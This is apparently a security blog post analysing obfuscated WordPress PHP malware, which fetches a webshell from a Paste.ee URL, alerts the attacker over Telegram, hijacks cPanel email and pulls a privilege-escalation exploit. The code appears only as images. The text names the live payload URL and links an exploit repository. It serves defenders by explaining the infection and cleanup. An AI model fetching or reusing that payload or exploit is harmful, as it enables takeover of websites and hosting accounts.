---
title: "Unveiling Paste.ee Served PHP Malware: Recursive Deobfuscation cPanel Hijacks Telegram Notifications"
date: 2025-01-05
author: "Shiv"
featured_image: "https://malcure.com/wp-content/uploads/2025/01/unveiling-pasteee-served-php-malware-recursive-deobfuscation-cpanel-hijacks-telegram-notifications-scaled.jpg"
categories:
  - name: "News"
    url: "/blog/news.md"
---

# Unveiling Paste.ee Served PHP Malware: Recursive Deobfuscation cPanel Hijacks Telegram Notifications

A stealthy recurring WordPress malware that is recursively obfuscated and fetches webshell from Paste.ee—A free, easy to use Pastebin, allowing full system hijack including control over website’s control-panel can be quite shocking.

Let’s dig in.

## Original Obfuscated Malware

Here’s the original code:

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-o.png)## Deobfuscation Iteration 1

This decodes into:

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-c.png)## Fetching Random CVE Exploit from GitHub

The above code fetches malware from https://paste.ee/r/ztSOp/0: Of course the contents of this URL can be updated to inject other malware.

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-u.png)## The Webshell with Telegram Notification to the Attacker

This finally decodes into a powerful webshell. Here’s the code notifying via Telegram:

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-t.png)## Malicious CPanel Email Update

Here’s the bit that allows resetting CPanel email so that the attacker can get access to the CPanel account.

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-cp.png)And finally the bit that exploits a CVE like https://github.com/berdav/CVE-2021-4034. Of course since the contents of the URL at https://paste.ee/r/ztSOp/0 can be updated, the CVE could be different for each attack.

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-g.png)This is a nasty malware and the only solution is to create a WordPress / data backup. Get a new hosting account. Clean the data offline to prevent reinfection and then restore the cleaned data.

### Decoding The ASCII Bits

One little thing left to deobfuscate is the ASCII code.

![](https://malcure.com/wp-content/uploads/2025/01/pastee-malware-d.png)## Automating Deobfuscation &amp; Decoding

A deobfuscator was created for automating the decoding of this malware as the original infection resulted in a looped obfusation with nested iterations. The same can be found at:

[https://github.com/MalcureCyber/malcure\_malware\_decoder](https://github.com/MalcureCyber/malcure_malware_decoder)

**Alert:** The script is still nascent and should only be used in a sandbox environment for educational porpose.